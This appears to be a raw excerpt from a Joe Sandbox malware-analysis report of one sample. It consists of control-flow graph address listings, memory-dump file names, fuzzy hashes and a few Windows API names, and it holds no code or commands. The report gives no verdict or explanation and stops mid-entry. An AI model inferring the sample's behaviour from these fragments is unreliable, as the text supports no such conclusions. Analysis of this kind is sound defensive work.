                                                            control_flow_graph 721 7ff8490ef042-7ff8490ef04f 722 7ff8490ef051-7ff8490ef059 721->722 723 7ff8490ef05a-7ff8490ef159 721->723 722->723 728 7ff8490ef1f7-7ff8490ef20b 723->728 729 7ff8490ef15f-7ff8490ef17b 723->729 730 7ff8490ef211-7ff8490ef259 728->730 729->728 733 7ff8490ef17d-7ff8490ef192 729->733 734 7ff8490ef2f7-7ff8490ef30b 730->734 735 7ff8490ef25f-7ff8490ef27b 730->735 738 7ff8490ef194-7ff8490ef1a6 733->738 739 7ff8490ef1cb-7ff8490ef1f5 733->739 737 7ff8490ef311-7ff8490ef366 734->737 735->734 744 7ff8490ef27d-7ff8490ef292 735->744 746 7ff8490ef36c-7ff8490ef385 737->746 747 7ff8490ef3fb-7ff8490ef409 737->747 741 7ff8490ef1aa-7ff8490ef1bd 738->741 742 7ff8490ef1a8 738->742 739->730 741->741 745 7ff8490ef1bf-7ff8490ef1c7 741->745 742->741 750 7ff8490ef294-7ff8490ef2a6 744->750 751 7ff8490ef2cb-7ff8490ef2f5 744->751 745->739 746->747 756 7ff8490ef387-7ff8490ef399 746->756 748 7ff8490ef40f-7ff8490ef463 747->748 758 7ff8490ef4f8-7ff8490ef506 748->758 759 7ff8490ef469-7ff8490ef482 748->759 753 7ff8490ef2aa-7ff8490ef2bd 750->753 754 7ff8490ef2a8 750->754 751->737 753->753 757 7ff8490ef2bf-7ff8490ef2c7 753->757 754->753 763 7ff8490ef3d2-7ff8490ef3f9 756->763 764 7ff8490ef39b-7ff8490ef3ad 756->764 757->751 760 7ff8490ef50c-7ff8490ef664 758->760 759->758 768 7ff8490ef484-7ff8490ef496 759->768 780 7ff8490ef66c-7ff8490ef67e 760->780 763->748 765 7ff8490ef3b1-7ff8490ef3c4 764->765 766 7ff8490ef3af 764->766 765->765 769 7ff8490ef3c6-7ff8490ef3ce 765->769 766->765 773 7ff8490ef4cf-7ff8490ef4f6 768->773 774 7ff8490ef498-7ff8490ef4aa 768->774 769->763 773->760 775 7ff8490ef4ae-7ff8490ef4c1 774->775 776 7ff8490ef4ac 774->776 775->775 777 7ff8490ef4c3-7ff8490ef4cb 775->777 776->775 777->773 781 7ff8490ef686-7ff8490ef772 call 7ff8490ef78e 780->781 782 7ff8490ef680 780->782 793 7ff8490ef774 781->793 794 7ff8490ef779-7ff8490ef78d 781->794 782->781 793->794
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: -<_H
                                                            • API String ID: 0-457784370
                                                            • Opcode ID: f86db1068b49c66e26411cc63f4a7825aa4674961c8ec1a52f11969929f516f1
                                                            • Instruction ID: bbd6df19f12cf74f448d6d45dd254609ff42df5e89695a630ec26eb06894155e
                                                            • Opcode Fuzzy Hash: f86db1068b49c66e26411cc63f4a7825aa4674961c8ec1a52f11969929f516f1
                                                            • Instruction Fuzzy Hash: 13323970959A8D8FEFB8EF28C8597E937E1FB58351F10412AD84DCB291DB789680CB41
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a7a7ba2b42ac2d7a7be9025ce1a01c691fab73639514ea5eb7ecc8f5f4cd122d
                                                            • Instruction ID: 92427449b2cedbfc500b76e3da9fd1fecdb0c2148af31ba511e1aa08a2533c53
                                                            • Opcode Fuzzy Hash: a7a7ba2b42ac2d7a7be9025ce1a01c691fab73639514ea5eb7ecc8f5f4cd122d
                                                            • Instruction Fuzzy Hash: 07322B70919A8D8FEFB8EF28C8597E937E1FB69341F00412AD84DC7691DB789580CB45
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b242c6330ad955446a38e88d608d5ead46d21cce16a79bbce8e32156b861886
                                                            • Instruction ID: adb46d11f91034c6033826e10dbdc56a63bd717854ce51f215ad1d163284592a
                                                            • Opcode Fuzzy Hash: 1b242c6330ad955446a38e88d608d5ead46d21cce16a79bbce8e32156b861886
                                                            • Instruction Fuzzy Hash: A6A1BA71D1DA9A9FE799EB28C8557AA7FE1FB99340F00017AD109E72D2CF781842C750
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4143b7340054bef42e990be43d6619a5f2d506a7c39de85d99c4cac6f31de5d6
                                                            • Instruction ID: d64d1e167555771107c399126a35d292089b31adf325b1295092da6c8dc4453b
                                                            • Opcode Fuzzy Hash: 4143b7340054bef42e990be43d6619a5f2d506a7c39de85d99c4cac6f31de5d6
                                                            • Instruction Fuzzy Hash: 5FF01935C0D159DFEF24EE98E8809FCB3B5BB95380F10116AD006A7292DB38AA45CB00

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 332 7ff8490de5d8-7ff8490de5f0 334 7ff8490de5f8-7ff8490de623 332->334 338 7ff8490de64c-7ff8490de652 334->338 339 7ff8490de659-7ff8490de65f 338->339 340 7ff8490de625-7ff8490de63e 339->340 341 7ff8490de661-7ff8490de666 339->341 342 7ff8490de735-7ff8490de745 340->342 343 7ff8490de644-7ff8490de649 340->343 344 7ff8490de553-7ff8490de598 341->344 345 7ff8490de66c-7ff8490de6a1 341->345 350 7ff8490de747 342->350 351 7ff8490de748-7ff8490de796 342->351 343->338 344->339 349 7ff8490de59e-7ff8490de5a4 344->349 352 7ff8490de555-7ff8490de72d 349->352 353 7ff8490de5a6 349->353 350->351 352->342 357 7ff8490de5cf-7ff8490de5d6 353->357 357->332 360 7ff8490de5a8-7ff8490de5c1 357->360 360->342 361 7ff8490de5c7-7ff8490de5cc 360->361 361->357
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $xOI
                                                            • API String ID: 0-3989629094
                                                            • Opcode ID: a51e9965f9e0c496397e6aafe2b2d36406592f449a2f0b099060ed0aa4c781e9
                                                            • Instruction ID: a36d810b5e7f3b3ee31815e116dd70ebfd16aa0c6bd18ecfc1e005e38f2d66c2
                                                            • Opcode Fuzzy Hash: a51e9965f9e0c496397e6aafe2b2d36406592f449a2f0b099060ed0aa4c781e9
                                                            • Instruction Fuzzy Hash: 45516C70D0C58A9FEB59EFA8C4585FDBBB5FF48340F1045BAC00AE7286DA38A945CB50

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f10000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .$X
                                                            • API String ID: 0-1506445976
                                                            • Opcode ID: 0a3d06dbb898516eb5c4b9f0037aa2326eacb321a347d1b61a4c66ff55c4126a
                                                            • Instruction ID: d9ddb999048f3af8c650fce20fb5c9e20bfaaaf14ded0af2f72f55149dafc962
                                                            • Opcode Fuzzy Hash: 0a3d06dbb898516eb5c4b9f0037aa2326eacb321a347d1b61a4c66ff55c4126a
                                                            • Instruction Fuzzy Hash: 2C11C5709482298FEB64EB14C8987ECB3B1FB94351F5052E9D50DA62C2CB785EC9CF48

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: [
                                                            • API String ID: 0-784033777
                                                            • Opcode ID: 61eb0a76b2905252b2db9fb1815fa857627866a778c1ba7830811a4810d4ecbd
                                                            • Instruction ID: 679926bb26417a3d55f4865c0254ac1a41be70cc82b785384b2f3ba118a4aac0
                                                            • Opcode Fuzzy Hash: 61eb0a76b2905252b2db9fb1815fa857627866a778c1ba7830811a4810d4ecbd
                                                            • Instruction Fuzzy Hash: 24924470A4891C8FCFA9EF18C894FA9B7B1FB69305F1041D9910EE7665DA31AE81CF44

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 497 7ff8490e7228-7ff8490e73f3 call 7ff8490e0768 513 7ff8490e8a1a-7ff8490e8a38 call 7ff8490e8bbd call 7ff8490e8c0d 497->513 514 7ff8490e73f9-7ff8490e7483 497->514 526 7ff8490e7485-7ff8490e74b8 514->526 527 7ff8490e74bd-7ff8490e759c 514->527 531 7ff8490e75a2-7ff8490e763d 526->531 527->531 542 7ff8490e7677-7ff8490e7756 531->542 543 7ff8490e763f-7ff8490e7672 531->543 546 7ff8490e775c-7ff8490e77f7 542->546 543->546 558 7ff8490e7803-7ff8490e78a9 546->558 559 7ff8490e77f9-7ff8490e77fe 546->559 560 7ff8490e78ac-7ff8490e793f 558->560 559->560 570 7ff8490e7941-7ff8490e7946 560->570 571 7ff8490e794b-7ff8490e79f3 560->571 572 7ff8490e79f4-7ff8490e7a87 570->572 571->572 582 7ff8490e7ac1-7ff8490e7ba0 572->582 583 7ff8490e7a89-7ff8490e7abc 572->583 586 7ff8490e7ba6-7ff8490e7c41 582->586 583->586 598 7ff8490e7c43-7ff8490e7c76 586->598 599 7ff8490e7c7b-7ff8490e7deb 586->599 602 7ff8490e7df1-7ff8490e7e8c 598->602 599->602 615 7ff8490e7ec6-7ff8490e8036 602->615 616 7ff8490e7e8e-7ff8490e7ec1 602->616 620 7ff8490e803c-7ff8490e80d7 615->620 616->620 634 7ff8490e8111-7ff8490e81f0 620->634 635 7ff8490e80d9-7ff8490e810c 620->635 640 7ff8490e81f6-7ff8490e8291 634->640 635->640 654 7ff8490e8293-7ff8490e82c6 640->654 655 7ff8490e82cb-7ff8490e83aa 640->655 659 7ff8490e83b0-7ff8490e844b 654->659 655->659 670 7ff8490e8485-7ff8490e85f5 659->670 671 7ff8490e844d-7ff8490e8480 659->671 674 7ff8490e85fb-7ff8490e8696 670->674 671->674 687 7ff8490e86d0-7ff8490e8840 674->687 688 7ff8490e8698-7ff8490e86cb 674->688 692 7ff8490e8846-7ff8490e88e1 687->692 688->692 707 7ff8490e88e3-7ff8490e88e8 692->707 708 7ff8490e88ed-7ff8490e8a0e 692->708 709 7ff8490e8a11-7ff8490e8a14 707->709 708->709 709->513
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: adf9f58a95e040d259f2aaa9d0857a2021b98548827871d81dedf5c26335607e
                                                            • Instruction ID: 24b3b7a5bc4cfb99e86d719732777e2427874f5781e35ed982ee185b520fff17
                                                            • Opcode Fuzzy Hash: adf9f58a95e040d259f2aaa9d0857a2021b98548827871d81dedf5c26335607e
                                                            • Instruction Fuzzy Hash: B0F2747194895D8FDFA8EF18C894FA9B7B1FB69301F1401E9900EE7291DA35AE81CF44

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 795 7ff848f767c1-7ff848f76878 799 7ff848f7687a-7ff848f76891 795->799 800 7ff848f76894-7ff848f769b6 CreateFileTransactedW 795->800 799->800 801 7ff848f769be-7ff848f76a40 800->801 802 7ff848f769b8 800->802 802->801
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6F000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f6f000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID: CreateFileTransacted
                                                            • String ID:
                                                            • API String ID: 2149338676-0
                                                            • Opcode ID: 8146f35d4a4892baf745a25eef0d04b68cffb3fe5e5c741d55ff99e41b72f7e1
                                                            • Instruction ID: f0bf8f2ad470c41416b4b95f2fa0d542b294f8713f13713833422a53833f83ca
                                                            • Opcode Fuzzy Hash: 8146f35d4a4892baf745a25eef0d04b68cffb3fe5e5c741d55ff99e41b72f7e1
                                                            • Instruction Fuzzy Hash: FD81DC70908A5C8FDB98EF58C894BA9BBF1FB69300F1051AED04EE3651DB75A980CB44

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 805 7ff8490eea86-7ff8490eea93 806 7ff8490eea95-7ff8490eea9d 805->806 807 7ff8490eea9e-7ff8490eec2a 805->807 806->807 815 7ff8490eec30-7ff8490eec49 807->815 816 7ff8490eecbf-7ff8490eeccd 807->816 815->816 820 7ff8490eec4b-7ff8490eec5d 815->820 817 7ff8490eecd3-7ff8490eed25 816->817 821 7ff8490eedba-7ff8490eedc8 817->821 822 7ff8490eed2b-7ff8490eed44 817->822 826 7ff8490eec96-7ff8490eecbd 820->826 827 7ff8490eec5f-7ff8490eec71 820->827 824 7ff8490eedce-7ff8490eee6e 821->824 822->821 828 7ff8490eed46-7ff8490eed58 822->828 837 7ff8490eee76-7ff8490eee88 824->837 826->817 829 7ff8490eec75-7ff8490eec88 827->829 830 7ff8490eec73 827->830 835 7ff8490eed91-7ff8490eedb8 828->835 836 7ff8490eed5a-7ff8490eed6c 828->836 829->829 832 7ff8490eec8a-7ff8490eec92 829->832 830->829 832->826 835->824 838 7ff8490eed70-7ff8490eed83 836->838 839 7ff8490eed6e 836->839 840 7ff8490eee90-7ff8490eef76 call 7ff8490eef92 837->840 841 7ff8490eee8a 837->841 838->838 842 7ff8490eed85-7ff8490eed8d 838->842 839->838 853 7ff8490eef7d-7ff8490eef91 840->853 854 7ff8490eef78 840->854 841->840 842->835 854->853
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5<_H
                                                            • API String ID: 0-2397324098
                                                            • Opcode ID: 2b8c9ba012f448ec21bcc36eb5a398573e4057ece4c20067e2075775439ef5de
                                                            • Instruction ID: 1ce49f9ef4e2e09f5f7a90197d8d5a0999e0da0f963bcb5d1946880ac6174391
                                                            • Opcode Fuzzy Hash: 2b8c9ba012f448ec21bcc36eb5a398573e4057ece4c20067e2075775439ef5de
                                                            • Instruction Fuzzy Hash: 69F15B70909A8D8FEFB8EF28C859BE937E1FB59341F10412AD84EC7291DB799580CB41

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 855 7ff848f76b21-7ff848f76be2 859 7ff848f76c0a-7ff848f76cad WriteFile 855->859 860 7ff848f76be4-7ff848f76c07 855->860 861 7ff848f76caf 859->861 862 7ff848f76cb5-7ff848f76d11 859->862 860->859 861->862
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6F000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f6f000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID: FileWrite
                                                            • String ID:
                                                            • API String ID: 3934441357-0
                                                            • Opcode ID: 1337d5fe3cf1db8d3eb3f48aaf97778e3b77d6e75f9be21cf706dbe03cae0cd5
                                                            • Instruction ID: 9db9a86da0b5b150dc6bdeec90ddd6d6bfa42acbab6d2479d387aa306875b7e9
                                                            • Opcode Fuzzy Hash: 1337d5fe3cf1db8d3eb3f48aaf97778e3b77d6e75f9be21cf706dbe03cae0cd5
                                                            • Instruction Fuzzy Hash: 1661F270908A5C8FDB98EF58C895BE9BBF1FB69301F1041AED04DE3291DB74A984CB44

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 864 7ff848f2207e-7ff848f2208b 865 7ff848f2208d-7ff848f22095 864->865 866 7ff848f22096-7ff848f220a7 864->866 865->866 867 7ff848f220a9-7ff848f220b1 866->867 868 7ff848f220b2-7ff848f221cb VirtualProtect 866->868 867->868 873 7ff848f221cd 868->873 874 7ff848f221d3-7ff848f22223 868->874 873->874
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F1F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1F000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f1f000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: d2adf56f6c4d08c21aed12a4b3a9bc55f443eaea0e1f20e8a0ce8fc67c3c5eae
                                                            • Instruction ID: 57666cd17b33c523ef0675bb78722952a9454145d75f0f9bbcc12ff16c6fc12e
                                                            • Opcode Fuzzy Hash: d2adf56f6c4d08c21aed12a4b3a9bc55f443eaea0e1f20e8a0ce8fc67c3c5eae
                                                            • Instruction Fuzzy Hash: 1C518D30D0864D8FEB54DFA8D885AEDBBF1FB66310F10426AD449E3252DB75A885CB81

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F5A000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f5a000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: MJ_H
                                                            • API String ID: 0-1880350675
                                                            • Opcode ID: 14b58e50b87ed5f0665b67733400559707dcf314b6f1d275567391f49d4d9555
                                                            • Instruction ID: 77e6a8938f098d7644c06b5874a53d8fb78d4791923c1fe3fd0a1e919e48cc3d
                                                            • Opcode Fuzzy Hash: 14b58e50b87ed5f0665b67733400559707dcf314b6f1d275567391f49d4d9555
                                                            • Instruction Fuzzy Hash: FEF16871D1AA5A9FDB98EB68C8657B8B7B1FF59340F4441B9D00DE32C2CB386885CB05

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 960 7ff8490de84f-7ff8490de862 961 7ff8490de864-7ff8490deba5 960->961 962 7ff8490de8ae-7ff8490de8c4 960->962 966 7ff8490debaf-7ff8490debee 961->966 963 7ff8490de954-7ff8490de984 962->963 964 7ff8490de8ca-7ff8490de8d2 962->964 975 7ff8490dea2e-7ff8490dea37 963->975 976 7ff8490de98a-7ff8490de98b 963->976 964->966 967 7ff8490de8d8-7ff8490de8ea 964->967 980 7ff8490debf0 966->980 967->966 969 7ff8490de8f0-7ff8490de907 967->969 970 7ff8490de947-7ff8490de94e 969->970 971 7ff8490de909-7ff8490de910 969->971 970->963 970->964 971->966 974 7ff8490de916-7ff8490de944 971->974 974->970 978 7ff8490dea3d-7ff8490dea43 975->978 979 7ff8490deb6f-7ff8490deb95 975->979 981 7ff8490de98e-7ff8490de9a4 976->981 978->966 982 7ff8490dea49-7ff8490dea58 978->982 987 7ff8490debfb-7ff8490dec91 980->987 981->966 983 7ff8490de9aa-7ff8490de9ce 981->983 984 7ff8490deb62-7ff8490deb69 982->984 985 7ff8490dea5e-7ff8490dea65 982->985 988 7ff8490dea21-7ff8490dea28 983->988 989 7ff8490de9d0-7ff8490de9f3 983->989 984->978 984->979 985->966 990 7ff8490dea6b-7ff8490dea75 985->990 995 7ff8490dec16-7ff8490dec96 987->995 996 7ff8490dec9c-7ff8490df165 987->996 988->975 988->981 989->966 994 7ff8490de9f9-7ff8490dea1f 989->994 997 7ff8490dea7c-7ff8490dea87 990->997 994->988 994->989 995->996 1005 7ff8490dec38-7ff8490dec98 995->1005 999 7ff8490deac6-7ff8490dead5 997->999 1000 7ff8490dea89-7ff8490deaa0 997->1000 999->966 1003 7ff8490deadb-7ff8490deaff 999->1003 1000->966 1002 7ff8490deaa6-7ff8490deac2 1000->1002 1002->1000 1006 7ff8490deac4 1002->1006 1007 7ff8490deb02-7ff8490deb1f 1003->1007 1005->996 1016 7ff8490dec5c-7ff8490dec9a 1005->1016 1011 7ff8490deb42-7ff8490deb58 1006->1011 1007->966 1012 7ff8490deb25-7ff8490deb40 1007->1012 1011->966 1014 7ff8490deb5a-7ff8490deb5e 1011->1014 1012->1007 1012->1011 1014->984 1016->996 1021 7ff8490dec7d-7ff8490dec90 1016->1021
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: <2_H
                                                            • API String ID: 0-4185006530
                                                            • Opcode ID: eddac912abd50cb6f4143de5e7dcd321baad02cb9331a48cc68425534837356b
                                                            • Instruction ID: fe4b4a108af9e8d68d0144696a30b55a1207e45a50d7ff7966865880a8513797
                                                            • Opcode Fuzzy Hash: eddac912abd50cb6f4143de5e7dcd321baad02cb9331a48cc68425534837356b
                                                            • Instruction Fuzzy Hash: CCF190309186958FEF69DF18C4D46F57BA5FF45310B5446BDC84B8B68ACA38F882CB41

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1023 7ff848f796f1-7ff848f79741 1024 7ff848f79744-7ff848f79813 GetSystemInfo 1023->1024 1025 7ff848f79743 1023->1025 1029 7ff848f7981b-7ff848f7984b 1024->1029 1030 7ff848f79815 1024->1030 1025->1024 1030->1029
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2179939802.00007FF848F6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F6F000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff848f6f000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem
                                                            • String ID:
                                                            • API String ID: 31276548-0
                                                            • Opcode ID: 8dc87f136683c68585dfd92744ef3ca649d449fc83b347a1373f2af65b50a02c
                                                            • Instruction ID: 220258e75e8e9ab5b4e85bd6e9fb8f8eba33928a2d88619caa5d2a1acee60060
                                                            • Opcode Fuzzy Hash: 8dc87f136683c68585dfd92744ef3ca649d449fc83b347a1373f2af65b50a02c
                                                            • Instruction Fuzzy Hash: C751D17090CA8C8FEB46DF68D859AE9BFF0EF56310F1440ABD049DB2A3DA345846CB11

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1033 7ff8490df891 1034 7ff8490df896-7ff8490df89e 1033->1034 1035 7ff8490df8a4-7ff8490df8b6 call 7ff8490df260 1034->1035 1036 7ff8490dfa21-7ff8490dfa35 1034->1036 1040 7ff8490df885-7ff8490df88c 1035->1040 1041 7ff8490df8b8-7ff8490df8bd 1035->1041 1042 7ff8490dfa37 1036->1042 1043 7ff8490dfa3c-7ff8490dfa47 1036->1043 1044 7ff8490dfa60-7ff8490dfa65 1040->1044 1045 7ff8490df8df-7ff8490df8f0 1041->1045 1046 7ff8490df8bf-7ff8490df8c3 1041->1046 1042->1043 1044->1033 1049 7ff8490df8f6-7ff8490df90b 1045->1049 1050 7ff8490dfa6a-7ff8490dfa85 1045->1050 1047 7ff8490df9c3-7ff8490df9d4 1046->1047 1048 7ff8490df8c9-7ff8490df8da 1046->1048 1060 7ff8490df9d6 1047->1060 1061 7ff8490df9db-7ff8490df9e6 1047->1061 1048->1036 1049->1050 1051 7ff8490df911-7ff8490df91d 1049->1051 1058 7ff8490dfa87 1050->1058 1059 7ff8490dfa8d 1050->1059 1052 7ff8490df91f-7ff8490df936 call 7ff8490ddd70 1051->1052 1053 7ff8490df94e-7ff8490df964 call 7ff8490df260 1051->1053 1052->1047 1068 7ff8490df93c-7ff8490df94b call 7ff8490ddea0 1052->1068 1053->1047 1067 7ff8490df966-7ff8490df971 1053->1067 1058->1059 1064 7ff8490dfa91-7ff8490dfaf3 1059->1064 1065 7ff8490dfa8f 1059->1065 1060->1061 1080 7ff8490dfafe-7ff8490dfb1c 1064->1080 1081 7ff8490dfabb-7ff8490dfaf7 1064->1081 1065->1064 1067->1050 1070 7ff8490df977-7ff8490df98c 1067->1070 1068->1053 1070->1050 1074 7ff8490df992-7ff8490df9a5 1070->1074 1076 7ff8490df9a7-7ff8490df9c1 call 7ff8490ddd70 1074->1076 1077 7ff8490df9f9-7ff8490dfa01 1074->1077 1076->1047 1087 7ff8490df9e7-7ff8490df9f6 call 7ff8490ddea0 1076->1087 1082 7ff8490dfa09-7ff8490dfa0c 1077->1082 1097 7ff8490dfad5-7ff8490dfaf0 1081->1097 1098 7ff8490dfb1e-7ff8490dfb50 1081->1098 1085 7ff8490dfa13-7ff8490dfa1b 1082->1085 1085->1036 1090 7ff8490df85a-7ff8490df867 1085->1090 1087->1077 1090->1085 1094 7ff8490df86d-7ff8490df881 1090->1094 1094->1085 1101 7ff8490dfc38-7ff8490dfc3d 1098->1101 1105 7ff8490dfc51-7ff8490dfc6f 1101->1105 1106 7ff8490dfb6c-7ff8490dfc47 1101->1106 1114 7ff8490dfb96-7ff8490dfb99 1106->1114 1115 7ff8490dfc1d-7ff8490dfc35 1106->1115 1114->1115 1117 7ff8490dfb9f-7ff8490dfba2 1114->1117 1115->1101 1118 7ff8490dfba4-7ff8490dfbd1 1117->1118 1119 7ff8490dfc0b-7ff8490dfc12 1117->1119 1120 7ff8490dfc14-7ff8490dfc1c 1119->1120 1121 7ff8490dfbd2-7ff8490dfbec 1119->1121 1123 7ff8490dfc71-7ff8490dfcc1 call 7ff8490dc4d0 1121->1123 1124 7ff8490dfbf2-7ff8490dfbfd 1121->1124 1124->1123 1125 7ff8490dfbff-7ff8490dfc09 1124->1125 1125->1119
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: POI
                                                            • API String ID: 0-723623226
                                                            • Opcode ID: 89d35da8006611f87e2e12cab915c53de57823bad3a7889ef41ec34e32f5b5bf
                                                            • Instruction ID: 2ecd50e7fec9931d3b60313532cb8072ae3982d372d2fa8c4de75f68f87028a9
                                                            • Opcode Fuzzy Hash: 89d35da8006611f87e2e12cab915c53de57823bad3a7889ef41ec34e32f5b5bf
                                                            • Instruction Fuzzy Hash: EFD1D330A6CB868FEB78EF28D49057577E6FF44350B14867EC58AC7682DE29F8428741
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000C.00000002.2181731404.00007FF8490D9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D9000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_12_2_7ff8490d9000_hBoBqOIwjXsCbkOMEKwZ.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: <_L
                                                            • API String ID: 0-1147621794
                                                            • Opcode ID: 6f9e9003c85303079368aef9d6f787d42cf3a34400be2693f2c5cab0e5d6e45c
                                                            • Instruction ID: 37b188f06a7d6d548d7183b9cd5a493f817704e505a4d2683da873f388e03bf3
                                                            • Opcode Fuzzy Hash: 6f9e9003c85303079368aef9d6f787d42cf3a34400be2693f2c5cab0e5d6e45c
